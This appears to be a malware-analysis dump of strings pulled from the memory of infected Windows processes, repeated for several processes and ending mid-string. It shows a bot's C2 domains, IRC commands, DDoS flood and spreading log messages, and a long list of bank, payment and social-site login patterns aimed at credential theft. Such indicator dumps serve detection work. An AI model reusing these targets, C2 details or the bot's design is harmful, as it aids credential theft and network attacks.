%d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>spoolsv.exe_1432_rwx_00D00000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\spoolsv.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\spoolsv.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>Explorer.EXE_1948_rwx_02220000_00001000:</b><pre>b.fjwhwproxiesfwhj123.com</pre><pre>ws2_32.dll</pre><pre>advapi32.dll</pre><b>Explorer.EXE_1948_rwx_02240000_00002000:</b><pre>C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-2266654\876668j1.exe</pre><b>Explorer.EXE_1948_rwx_023F0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0@</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%WinDir%\Explorer.EXE</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" 